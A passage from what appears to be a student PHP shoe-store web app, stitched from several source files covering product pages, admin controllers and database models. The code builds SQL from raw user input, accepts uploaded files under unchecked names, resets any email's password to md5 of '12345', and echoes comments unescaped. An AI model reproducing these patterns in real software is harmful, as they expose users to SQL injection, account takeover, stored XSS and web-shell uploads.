<input type="hidden" name="namess" value="<?php echo $product->name; ?>">
<input type="hidden" name="idproductss" value="<?php echo number_format($product->id); ?>">
<div class="select-catagory">
<div class="size-select">
<label class="required">
<em>*</em> Màu sắc : <?php echo $ten_color['color']; ?>
</label>
<!-- <div class="input-box" style="width:30%">
<select name="color" id="select-1">
<option style="text-align:center" value=""></option>
</select>
</div> -->
</div>
<div class="size-select">
<label class="required">
<em>*</em> Size: <?php echo $size['size']; ?>
</label>
<!-- <div class="input-box" style="width:30%; ">
<select name="size" id="select-2">
<option style="text-align:center" value="">-- Please Select --</option>
</select>
</div> -->
</div>
</div>
<div class="cart-item">
<div class="single-cart">
<!--
<label>Số lượng: </label>
<select style="width: 100px; height: 40px; margin-top:10px;" name="select_amount">
<?php for ($i = 1; $i <= $size['soluong']; $i++) { ?>
<option value="<?= $i ?>"><?= $i ?></option>
<?php } ?>
</select> -->
<br>
<a class="cart-btn" href="?action=giohang&act=add_giohang&id=<?= $data_chitiet['idSP'] ?>">ADD TO CART</a>
<!-- <input id="add-to-cart" class="cart-btn" type="submit" name="submitcart" value="ADD TO CART"> -->
<!-- <input id="buy-now" class="cart-btn" type="submit" name="buynow" value="BUY NOW"> -->
</div>
</div>
</form>
</div>
<div class="single-product-info">
<p><?php echo $data_chitiet['mota']; ?></p>
<div class="share">
<img src="public/img/product/share.png" alt="">
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- single product details end -->
<!-- single product tab start -->
<div class="single-product-tab-area">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="single-product-tab">
<ul class="single-product-tab-navigation" role="tablist">
<li role="presentation" class="active"><a href="#tab1" aria-controls="tab1" role="tab" data-toggle="tab">Chi tiết sản phẩm</a></li>
<li role="presentation"><a href="#tab2" aria-controls="tab2" role="tab" data-toggle="tab">Bình luận</a></li>
<!-- <li role="presentation"><a href="#tab3" aria-controls="tab3" role="tab" data-toggle="tab">product tag</a></li> -->
</ul>
<!-- Tab panes -->
<div class="tab-content single-product-page">
<div role="tabpanel" class="tab-pane fade in active" id="tab1">
<div class="single-p-tab-content">
<div class="tb">
<h5>ĐẶC ĐIỂM</h5>
<ul>
<li>
<span>kiểu giày: <span><?php echo $ten_loaisanpham['tenLSP']; ?></span></span>
</li>
<li>
<span>Màu sắc: <span><?php echo $ten_color['color']; ?></span></span>
</li>
<li>
<span>Kích cỡ: <span><?php echo $size['size']; ?></span></span>
</li>
<li>
<span>Số lượng còn trong kho: <span><?php echo $size['soluong']; ?></span></span>
</li>
<li>
<span>Ngày nhập: <span><?php echo $data_chitiet['ngaynhap']; ?></span></span>
</li>
</ul>
</div>
</div>
</div>
<div role="tabpanel" class="tab-pane fade" id="tab2">
<div class="single-p-tab-content">
<div class="row">
<?php foreach ($xem_gopy as $value) { ?>
<?php if ($data_chitiet['idSP'] == $value['idSP']) { ?>
<div style="padding: 20px; border: 1px dotted gray; width: 100%; margin: 5px; border-radius: 10px;">
<span> <STRONG>
<?php echo $value['email']; ?>
</STRONG>
<span style="padding-left: 30px">
<?php echo $value['noidung']; ?>
</span></span>
</div>
<?php } ?>
<?php } ?>
<form action="?action=gopy&id=<?php echo $data_chitiet['idSP']; ?>" method="POST" style="margin-top: 20px; border: 1px dotted gray; padding-left: 10px; padding-top: 5px; border-radius: 10px">
<input type="hidden" name="idSP" value="<?php echo $data_chitiet['idSP']; ?>">
<input style="margin-top: 10px;font-family: inherit; font-size: inherit; line-height: inherit; height: 40px;display: block;padding: 10px 10px;border: 1px solid #ddd;width: 35%;margin-bottom: 15px;" type="text" name="email_gopy" placeholder="Email của bạn"><br>
<textarea placeholder="Nội dung..." style="font-family: inherit; font-size: inherit; line-height: inherit; height: 50px;display: block;padding: 5px 10px;border: 1px solid #ddd;width: 95%;margin-bottom: 15px; resize: none;" name="noidung_gopy"></textarea><br>
<input style="display: block;border: none;outline: none;background: #4fa327;color: #fff;padding: 8px 20px;margin-bottom: 50px;" type="submit" name="submitcomment" value="ADD COMMENT">
</form>
<?php
?>
</div>
</div>
</div>
<!-- <div role="tabpanel" class="tab-pane fade" id="tab3">
<div class="single-p-tab-content">
<div class="add-tab-title">
<p> add your tag </p>
</div>
<div class="add-tag">
<form action="#">
<input type="text">
<button type="submit">add tags</button>
</form>
</div>
<p class="tag-rules">Use spaces to separate tags. Use single quotes (') for phrases.</p>
</div>
</div> -->
</div>
</div>
</div>
</div>
</div>
</div>
<!-- single product tab end -->
</div><file_sep>/admin/controller_admin/duyethoadon.php
<?php
// Controller used to call the functions in the model
require_once('./model_admin/sanpham.php');
require_once('./model_admin/hoadon.php'); // already wired up
require_once('./model_admin/nguoidung.php');
/**
*
*/
class hoadoncontroller
{
var $hoadon_model;
var $sanpham_model;
var $nguoidung_model;
public function __construct()
{
$this->hoadon_model = new hoadon();
$this->sanpham_model = new sanpham();
$this->nguoidung_model = new nguoidung();
}
public function list()
{
if(isset($_POST['timkiem_hd'])){
$timkiem_hd = $_POST['timkiem_hd'];
$data = $this->hoadon_model->timkiem_hd($timkiem_hd);
}else{
$data = $this->hoadon_model->all();
$sanpham = $this->sanpham_model->all_them();
$user = $this->nguoidung_model->getAll();
}
require_once('views_admin/index.php');
}
public function details() // in progress
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->hoadon_model->find($id);
require_once('views_admin/index.php');
}
public function xoahoadon() // not finished yet
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->hoadon_model->delete($id);
}
public function chitiet_hoadon()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$data = $this->hoadon_model->find($id);
$idUser = isset($_GET['idUser']) ? $_GET['idUser'] : '1';
$name_user = $this->hoadon_model->user($idUser);
$idSP = isset($_GET['idSP']) ? $_GET['idSP'] : '1';
$name_sanpham = $this->hoadon_model->sanpham($idSP);
require_once('views_admin/index.php');
}
public function duyet_hoadon()
{
$id = $_GET['id'];
$this->hoadon_model->duyet_hoadon($id);
$idSP = $_GET['idSP'];
$sotru = $_GET['soluongmua'];
$this->hoadon_model->sanpham_tru($idSP, $sotru);
require_once('views_admin/index.php');
}
}
<file_sep>/admin/controller_admin/quanlybanner.php
<?php
// Controller used to call the functions in the model
require_once('./model_admin/banner.php'); // already wired up
/**
*
*/
class bannercontroller
{
var $banner_model;
public function __construct()
{
$this->banner_model = new banner();
}
public function list()
{
if(isset($_POST['timkiem_bn'])){
$timkiem_bn = $_POST['timkiem_bn'];
$data = $this->banner_model->timkiem_bn($timkiem_bn);
}else{
$data = $this->banner_model->all();
}
require_once('views_admin/index.php');
}
public function details()
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->banner_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$idbanner = filter_input(INPUT_POST, 'idbanner');
$anh = $_FILES['anh']['name'];
$anh_tmp = $_FILES['anh']['tmp_name'];
move_uploaded_file($anh_tmp, './public_admin/image/banner/'.$anh);
$this->banner_model->update($idbanner, $anh);
}
public function them()
{
$idbanner = filter_input(INPUT_POST, 'idbanner');
$anhbanner = $_FILES['anhbanner']['name'];
$anhbanner_tmp = $_FILES['anhbanner']['tmp_name'];
move_uploaded_file($anhbanner_tmp, './public_admin/image/banner/'.$anhbanner);
$this->banner_model->insert($idbanner, $anhbanner);
}
public function xoabanner()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->banner_model->delete($id);
}
}
?><file_sep>/admin/views_admin/index.php
<!DOCTYPE html>
<html>
<head>
<title>Admin Shoe Store</title>
<meta charset="utf-8">
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<!-- Bootstrap 3.3.7 -->
<link rel="stylesheet" href="public_admin/assets/css/bootstrap.min.css">
<!-- Font Awesome -->
<link rel="stylesheet" href="public_admin/assets/css/font-awesome.min.css">
<link rel="stylesheet" href="public_admin/assets/css/AdminLTE.min.css">
<!-- AdminLTE Skins. Choose a skin from the css/skins
folder instead of downloading all of them to reduce the load. -->
<link rel="stylesheet" href="public_admin/assets/css/_all-skins.min.css">
<!-- Google Font -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
<script type="text/javascript" src="public_admin/ckeditor/ckeditor.js"></script>
<script type="text/javascript" src="public_admin/ckfinder/ckfinder.js"></script>
<!-- css -->
<link rel="stylesheet" type="text/css" href="public_admin/css/style.css">
<link rel="stylesheet" type="text/css" href="public_admin/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="public_admin/css/font-awesome.min.css">
<script type="text/javascript" src="views_admin/sanpham/ckeditor/ckeditor.js"></script>
</head>
<body>
<?php
require_once('layout/layout.php');
?>
<?php
require_once('dieuhuong.php');
?>
<?php
require_once('layout/footer.php');
?>
</body>
<!-- ./wrapper -->
<!-- jQuery 3 -->
<script src="public_admin/assets/js/jquery.min.js"></script>
<!-- jQuery UI 1.11.4 -->
<script src="public_admin/assets/js/jquery-ui.min.js"></script>
<!-- Bootstrap 3.3.7 -->
<script src="public_admin/assets/js/bootstrap.min.js"></script>
<!-- AdminLTE App -->
<script src="public_admin/assets/js/adminlte.min.js"></script>
</html>
<file_sep>/model/quenMK.php
<?php
require_once('ketnoi.php');
/**
*
*/
class Matkhau
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham()
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function laymatkhau($email)
{
// $query = "SELECT matkhau FROM user WHERE email = '$email' ";
        $mk = md5(12345); // reset the password to the default "12345"
$query2 = "UPDATE user SET matkhau = '$mk' WHERE email='$email' ";
// return $this->conn->query($query)->fetch_assoc();
return $this->conn->query($query2);
}
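    // Hedged sketch, not wired into any controller: the login flow elsewhere
    // still compares md5() hashes, so this only illustrates a safer reset
    // that issues a random temporary password via a prepared statement.
    function laymatkhau_antoan($email)
    {
        $tam = bin2hex(random_bytes(4)); // 8-character temporary password
        $bam = md5($tam); // kept as md5 so the existing login check still works
        $stmt = $this->conn->prepare("UPDATE user SET matkhau = ? WHERE email = ?");
        $stmt->bind_param('ss', $bam, $email);
        return $stmt->execute() ? $tam : false;
    }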
}
<file_sep>/views/slider/slider.php
<div class="slider-area home2">
<div class="bend niceties preview-2">
<div id="nivoslider" class="slides">
<?php
$i = 0;
$array = '#slider-direction-';
foreach ($data_banner as $value) {
$i++;
?>
<img src="admin/public_admin/image/banner/<?php echo $value['anh'] ?>" alt="" title="<?php echo ($array . $i); ?>">
<?php } ?>
</div>
<!-- direction 1 -->
<div id="slider-direction-1" class="t-cn slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-1">
<div class="title-container s-tb-c title-compress">
<h1 class="title1">Khuyến mãi</h1>
<h2 class="title2">Khuyến Mãi Hấp Dẫn Lên Đến 30%</h2>
<h3 class="title3"></h3>
<a href="#"><span>Mua Ngay</span></a>
</div>
</div>
</div>
<!-- direction 2 -->
<div id="slider-direction-2" class="slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-2">
<div class="title-container s-tb-c">
<h1 class="title1">Khuyến mãi đặc biệt</h1>
<h2 class="title2">sports center james</h2>
<h3 class="title3">Lorem Ipsum is simply dummy text of the printing</h3>
<a href="#"><span>Mua Ngay</span></a>
</div>
</div>
</div>
</div>
</div>
<!-- slider area end -->
<!-- service area start -->
<div class="service-area">
<div class="container">
<div class="row">
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>UY TÍN</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>CHẤT LƯỢNG</h3>
<p>Các nhãn hiệu đắt đỏ được giới trẻ săn lùng như Bape, Jordan, Yeezy, MLB, Human Race... </p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>THỜI THƯỢNG</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- service area end --><file_sep>/controller/cuahang_controller.php
<?php
// require_once('views/index.php'); the interface only renders once this is called
require_once('./model/show_cuahang.php');
/**
*
*/
class showcuahang
{
    var $cuahang_controller;
function __construct()
{
$this->cuahang_controller = new cuahang();
}
public function list()
{
if(isset($_GET['id'])){
$idLoaiSP = $_GET['id'];
$data_sanphamcuahang = $this->cuahang_controller->sanpham_cuahangtheoid($idLoaiSP);
}else{
$idLoaiSP = null;
}
$data_loaisanpham = $this->cuahang_controller->loaisanpham();
$color = $this->cuahang_controller->color();
$size = $this->cuahang_controller->size();
if(isset($_GET['idmau'])){
$idmau = $_GET['idmau'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_mau($idmau);
}else{
$idmau = null;
}
if(isset($_GET['idsize'])){
$idsize = $_GET['idsize'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_size($idsize);
}else{
$idsize = null;
}
if(isset($_POST['a']) && isset($_POST['b'])){
$a = $_POST['a'];
$b = $_POST['b'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_gia($a, $b);
}else{
$a = null;
$b = null;
}
        // select only products that have a promotion
if(isset($_GET['gtkm'])){
$gtkm = $_GET['gtkm'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_km($gtkm);
}else{
$gtkm = null;
}
require_once('views/index.php');
}
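    // Hedged sketch: the isset() branches above keep only the last filter that
    // matched, because each one overwrites $data_sanphamcuahang. This builds a
    // single combined WHERE clause instead (column names come from the sanpham
    // table in the dump); it is not wired into the model yet.
    private function loc_dieukien()
    {
        $dk = array();
        if (isset($_GET['id'])) {
            $dk[] = "idLoaiSP = " . (int) $_GET['id'];
        }
        if (isset($_GET['idmau'])) {
            $dk[] = "idcolor = " . (int) $_GET['idmau'];
        }
        if (isset($_GET['idsize'])) {
            $dk[] = "idsize = " . (int) $_GET['idsize'];
        }
        return $dk ? ' WHERE ' . implode(' AND ', $dk) : '';
    }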
public function list1()
{
$data_loaisanpham = $this->cuahang_controller->loaisanpham();
$color = $this->cuahang_controller->color();
$size = $this->cuahang_controller->size();
if(isset($_POST['timkiem_sp'])){
$timkiem_sp = $_POST['timkiem_sp'];
$data_sanphamcuahang = $this->cuahang_controller->timkiem_sp($timkiem_sp);
}else{
$data_sanphamcuahang = $this->cuahang_controller->sanpham_cuahang();
}
if(isset($_POST['a'])&& isset($_POST['b'])){
$a = $_POST['a'];
$b = $_POST['b'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_gia($a, $b);
}else{
$a = null;
$b = null;
}
require_once('views/index.php');
}
}
?><file_sep>/admin/views_admin/layout/layout.php
<body class="hold-transition skin-blue sidebar-mini">
<!-- -->
<div class="wrapper">
<header class="main-header">
<!-- Logo -->
<a href="?action=trangchu" class="logo">
<!-- mini logo for sidebar mini 50x50 pixels -->
<span class="logo-mini"><b>A</b>LT</span>
<!-- logo for regular state and mobile devices -->
<span class="logo-lg"><b></b>ADMIN</span>
</a>
<!-- Header Navbar: style can be found in header.less -->
<nav class="navbar navbar-static-top">
<!-- Sidebar toggle button-->
<a href="#" class="sidebar-toggle" data-toggle="push-menu" role="button">
<span class="sr-only">Toggle navigation</span>
</a>
<div class="navbar-custom-menu" style="margin-right:2%">
<ul class="nav navbar-nav">
<!-- User Account: style can be found in dropdown.less -->
<li class="dropdown user user-menu">
<a href="#">
<span class="hidden-xs"> <?php
if (isset($_SESSION['tendangnhap'])) {
echo "Xin chào " . $_SESSION['tendangnhap'];
} else {
echo "Xin Chào ...";
}
?></span>
</a>
</li>
</ul>
</div>
</nav>
</header>
<!-- Left side column. contains the logo and sidebar -->
<aside class="main-sidebar">
<!-- sidebar: style can be found in sidebar.less -->
<section class="sidebar">
<!-- Sidebar user panel -->
<div class="user-panel">
<div class="pull-left image">
</div>
<div class="pull-left info">
</div>
</div>
<!-- sidebar menu: : style can be found in sidebar.less -->
<ul class="sidebar-menu" data-widget="tree">
<li class="header">LAOYOUT ADMIN</li>
<li>
<a href="?action=loaisanpham">
<i class="fa fa-th"></i> <span>List danh mục</span>
</a>
</li>
<li>
<a href="?action=banner">
<i class="fa fa-th"></i> <span>List Banner</span>
</a>
</li>
<li>
<a href="?action=hoadon">
<i class="fa fa-th"></i> <span>List hóa đơn</span>
</a>
</li>
<li>
<a href="?action=sanpham"">
<i class=" fa fa-th"></i> <span>List sản phẩm</span>
</a>
</li>
<li>
<a href="?action=khuyenmai">
<i class="fa fa-th"></i> <span>List khuyến mãi</span>
</a>
</li>
<li>
<a href="?action=taikhoan">
<i class="fa fa-th"></i> <span>List Tài khoản</span>
<span class="pull-right-container">
<!--<small class="label pull-right bg-green">new</small>-->
</span>
</a>
</li>
</ul>
</section>
<!-- /.sidebar -->
</aside>
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<!-- Main content -->
<section class="content">
<!-- ./wrapper --><file_sep>/admin/model_admin/banner.php
<?php
// MODEL FOR BANNER DATA
require_once('ketnoi.php');
/**
*
*/
class banner
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function all()
{
$query = "SELECT * FROM banner ORDER BY idbanner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function timkiem_bn($timkiem_bn)
{
$query = "SELECT * FROM banner WHERE idbanner LIKE '%$timkiem_bn%' ORDER BY idbanner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function find($id)
{
$query = "SELECT * FROM banner WHERE idbanner=$id";
return $this->conn->query($query)->fetch_assoc();
}
function update($idbanner, $anh)
{
$query="UPDATE banner SET idbanner='$idbanner', anh='$anh' WHERE idbanner='$idbanner' ";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=banner');
}else{
header('Location: ?action=banner');
}
}
function insert($idbanner, $anhbanner)
{
$query= "INSERT INTO banner (idbanner, anh)
VALUES ('$idbanner', '$anhbanner') ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=banner');
}
else{
header('location: ?action=thembanner_giaodien');
}
}
    function delete($id) // not finished yet
{
$query = "DELETE FROM banner WHERE idbanner='$id' ";
$result = $this->conn->query($query);
if($result == true){
echo "<script> ";
echo "location.href='?action=banner';</script>";
}else{
echo "<script>";
echo "location.href='?action=banner';</script>";
}
}
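    // Hedged alternative to find() above: the string-built queries in this
    // model are open to SQL injection, so this sketch binds the id instead.
    // Assumes $this->conn is the mysqli handle set in the constructor.
    function find_antoan($id)
    {
        $stmt = $this->conn->prepare("SELECT * FROM banner WHERE idbanner = ?");
        $stmt->bind_param('i', $id);
        $stmt->execute();
        return $stmt->get_result()->fetch_assoc();
    }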
}
?><file_sep>/admin/controller_admin/home.php
<?php
// CONTROLLER THAT CALLS THE FUNCTIONS IN THE MODEL
require_once('./model_admin/trangchu.php'); // model is now loaded
/**
*
*/
class trangchucontroller
{
var $trangchu_model;
public function __construct()
{
$this->trangchu_model = new trangchu();
}
public function dem()
{
$data_user = $this->trangchu_model->all_user();
$data_sanpham = $this->trangchu_model->all_sanpham();
$data_loaisanpham = $this->trangchu_model->all_loaisanpham();
$data_hoadon = $this->trangchu_model->all_hoadon();
if (isset($_POST['ngay_gui'])) {
$ngay=filter_input(INPUT_POST, 'ngay_gui');
$loai_ngay = filter_input(INPUT_POST, 'ngay_gui');
$thang_nhan = date_create("$ngay");
$thang = date_format($thang_nhan, 'Y-m');
$loai_thang = date_format($thang_nhan, 'Y-m');
$nam_nhan = date_create("$ngay");
$nam = date_format($nam_nhan, 'Y');
$loai_nam = date_format($nam_nhan, 'Y');
}else{
$ngay = date("Y-m-d");
$loai_ngay="Hôm nay";
$thang = date("Y-m");
$loai_thang="này";
$nam = date("Y");
$loai_nam="này";
}
$thongke_hoadon_ngay = $this->trangchu_model->all_hoadon_day($ngay);
$thongke_hoadon_thang = $this->trangchu_model->all_hoadon_day($thang);
$thongke_hoadon_nam = $this->trangchu_model->all_hoadon_day($nam);
$data_banner = $this->trangchu_model->all_banner();
$data_khuyenmai = $this->trangchu_model->all_khuyenmai();
$data_layout = $this->trangchu_model->all_layout();
require_once('views_admin/index.php');
}
public function update_layout()
{
$mail = filter_input(INPUT_POST, 'mail');
$diachi = filter_input(INPUT_POST, 'diachi');
$phone = filter_input(INPUT_POST, 'phone');
$this->trangchu_model->update_layout($mail, $diachi, $phone);
}
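    // Hedged sketch: dem() above loads whole invoice lists and sums them in
    // PHP. A single aggregate query could return the same totals directly.
    // Assumes hoadon.ngaymua is a DATE, that only approved invoices
    // (trangthai = 1) should count, and that $conn is a mysqli handle.
    public function tongthu_theongay($conn, $ngay)
    {
        $stmt = $conn->prepare(
            "SELECT COUNT(*) AS so_hoadon, COALESCE(SUM(tongtien), 0) AS tongthu
             FROM hoadon WHERE ngaymua = ? AND trangthai = 1");
        $stmt->bind_param('s', $ngay);
        $stmt->execute();
        return $stmt->get_result()->fetch_assoc();
    }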
}
?><file_sep>/views/cuahang/cuahang.php
<div class="cuahang">
<h1>Cửa Hàng</h1>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Cửa hàng</li>
</ol>
</div>
</div>
</section>
<div class="container cn2">
<div class="row">
<div class="col-sm-3">
<div class="left-sidebar">
<h2>Thể Loại</h2>
<div class="panel-group category-products" id="accordian"><!--category-productsr-->
<?php foreach ($data_loaisanpham as $value) { ?>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title">
<a href="?action=cuahang&id=<?= $value['idLoaiSP'] ?>">
<?= $value['tenLSP'] ?>
</a>
</h4>
</div>
</div>
<?php } ?>
</div>
</div>
<div class="chongia">
<div class="chongia2">
<div class="dropdown" style="float:left; margin-left: 20px; margin-right: 30px;">
<button class="dropbtn">Màu</button>
<div class="dropdown-content" style="left:0;">
<div class="container" style="background-color: white; width: 500px;">
<?php foreach ($color as $value) { ?>
<div class="col-sm-2">
<a href="?action=cuahang&idmau=<?= $value['idcolor'] ?>" class="acolor">
<?php echo $value['color']; ?></a>
</div>
<?php } ?>
</div>
</div>
</div>
<div class="dropdown" style="margin-left: 9px;">
<button class="dropbtn">Size</button>
<div class="dropdown-content" style="left:-50px;">
<div class="container" style="background-color: white; width: 250px;">
<?php foreach ($size as $value) { ?>
<div class="col-sm-2">
<a href="?action=cuahang&idsize=<?= $value['idsize'] ?>" class="acolor">
<?php echo $value['size']; ?></a>
</div>
<?php } ?>
</div>
</div>
</div>
                <!-- price filter -->
<br>
<br>
</div>
<center><h4>Chọn giá</h4></center>
<div style="">
<form method="POST" action="?action=cuahang1">
<div class="" style="padding: 5px;">
<label>Chọn giá bắt đầu: </label>
<select name="a">
<option value="100">100.000 vnd</option>
<option value="200">200.000 vnd</option>
<option value="300">300.000 vnd</option>
<option value="400">400.000 vnd</option>
<option value="500">500.000 vnd</option>
<option value="600">600.000 vnd</option>
<option value="700">700.000 vnd</option>
<option value="800">800.000 vnd</option>
<option value="900">900.000 vnd</option>
<option value="1000">1.000.000 vnd</option>
</select>
<br>
<br>
<label>Chọn giá Kết thúc: </label>
<select name="b">
<option value="100">100.000 vnd</option>
<option value="200">200.000 vnd</option>
<option value="300">300.000 vnd</option>
<option value="400">400.000 vnd</option>
<option value="500">500.000 vnd</option>
<option value="600">600.000 vnd</option>
<option value="700">700.000 vnd</option>
<option value="800">800.000 vnd</option>
<option value="900">900.000 vnd</option>
<option value="1000">1.000.000 vnd</option>
</select>
<br>
<br>
<center>
<input type="submit" value="Tìm Kiếm">
</center>
</div>
</form>
</div>
                <!-- end price filter -->
</div>
<br>
<br>
        </div> <!-- third column -->
<div class="col-sm-9 padding-right c_cn2">
            <!-- product listing -->
<div class="features_items"><!--features_items-->
<h2 class="title text-center">SHOE - STORE</h2>
<?php foreach ($data_sanphamcuahang as $value) { ?>
<div class="col-sm-3">
<div class="single-product">
<div class="product-f">
<a href="#"><img src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="Product Title" class="img-products" /></a>
<div class="actions-btn">
<a href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>">
<center><i style="font-size: 30px;color:black;" class="fa fa-shopping-cart"></i></center>
</a>
<a href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>" data-toggle="modal" >
<center><i style="font-size: 20px;" class="fa fa-eye"></i></center>
</a>
</div>
</div>
<div class="product-dsc">
<p><a href="#"><center> <?php echo $value['tenSP'] ?></center></a></p>
<center>size: <?php echo $value['size'] ?> </center>
<center>Màu: <?php echo $value['color'] ?> </center>
<center>SL trong kho: <?php echo $value['soluong'] ?> </center>
<center>Khuyến mãi: <?php echo "<b class='km_km'>".$value['giatriKM']."%</b>" ?> </center>
<span>
<center>
<?php if($value['giatriKM'] != 0){
echo " <strike><i>".$value['Dongia'].".000 vnd</i></strike><br> ";
echo " <i class='fa fa-arrow-right'></i> ";
echo $value['Dongia'] - ($value['Dongia']*$value['giatriKM']/100).".000 vnd";
}else{
echo "<br>";
echo $value['Dongia'].".000 vnd";
}
?>
</center>
</span>
</div>
</div>
</div>
<?php } ?>
</div><!--features_items-->
<!--
<ul class="pagination">
<li class="active"><a href="">1</a></li>
<li><a href="">2</a></li>
<li><a href="">3</a></li>
<li><a href="">»</a></li>
</ul>
-->
</div>
</div> <!-- div row -->
</div>
<br>
<br>
<br>
<br>
<br>
<style>
b.km_km{
color: red;
}
strike i{
color: black;
font-weight: normal;
}
</style><file_sep>/admin/views_admin/khuyenmai/quanlykhuyenmai.php
<div class="col-md-12">
<?php if ($_SESSION['admin'] == true) { ?>
<div style="margin-bottom:5px;">
<a href="?action=themkhuyenmai_giaodien" class="btn btn-primary">Thêm khuyến mãi</a>
</div>
<?php } else {
} ?>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách khuyến mãi</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">Loại khuyến mãi</th>
<th style="text-align:center;">Giá trị KM(%)</th>
<th style="text-align:center;">Ngày bắt đầu</th>
<th style="text-align:center;">Ngày kết thúc</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $value) : ?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $value['loaiKM'] ?></td>
<td><?= $value['giatriKM'] ?></td>
<td><?= $value['ngaybatdau'] ?></td>
<td><?= $value['ngayketthuc'] ?></td>
<td>
                            <!-- note the "=" separators in the href query string -->
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=suakhuyenmai_giaodien&id=<?= $value['idKM'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoakhuyenmai&id=<?= $value['idKM'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa ">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php endforeach ?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div><file_sep>/admin/views_admin/taikhoan/sua.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h4>Database nguoidung</h4>
<div style="background-color: #e5e5e5; padding: 10px 50px 10px; color:gray;">
<form action="?action=sua_xl" method="post"> <!-- model_admin/sua_xl.php -->
<table border="0" cellpadding="10">
<tr>
<td>idUser: </td>
<td>
<input disabled type="text" name="id" value=<?php echo $data['idUser']; ?>>
<input type="hidden" name="id" value=<?php echo $data['idUser']; ?> >
</td>
</tr>
<tr>
<td>họ:</td>
<td><input required type="text" name="ho" value=<?php echo $data['ho']; ?> ></td>
</tr>
<tr>
<td>tên:</td>
<td><input required type="text" name="ten" value=<?php echo $data['ten']; ?>></td>
</tr>
<tr>
<td>email:</td>
<td><input id="email" required type="text" name="email" value=<?php echo $data['email']; ?>></td>
</tr>
<tr>
<td>địa chỉ:</td>
<td><input required type="text" name="diachi" value=<?php echo $data['diachi']; ?>></td>
</tr>
<tr>
<td>Giới tính:</td>
<td>
<input type="radio" name="gioitinh" value="nam" checked>Nam
<input type="radio" name="gioitinh" value="nu" >Nữ
</td>
</tr>
<tr>
<td>số điện thoại:</td>
<td><input required type="text" name="sodienthoai" value=<?php echo $data['sodienthoai']; ?>></td>
</tr>
<tr>
<td>tên đăng nhập:</td>
<td><input required type="text" name="tendangnhap" value=<?php echo $data['tendangnhap']; ?>></td>
</tr>
<tr>
<td>mật khẩu:</td>
<td><input required disabled type="password" name="matkhau" value=<?php echo $data['matkhau']; ?>></td>
</tr>
<tr>
<td colspan="2"><button style="width: 100px; background-color: darkgray;" type="submit">Sửa</button></td>
</tr>
</table>
</form>
</div>
</div>
</div>
<file_sep>/admin/views_admin/hoadon/lsist.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h4>Database hoadon</h4>
<div class="search_box pull-right" style="margin-right: 50px; margin-top: 0px;">
<form method="POST" action="?action=hoadon">
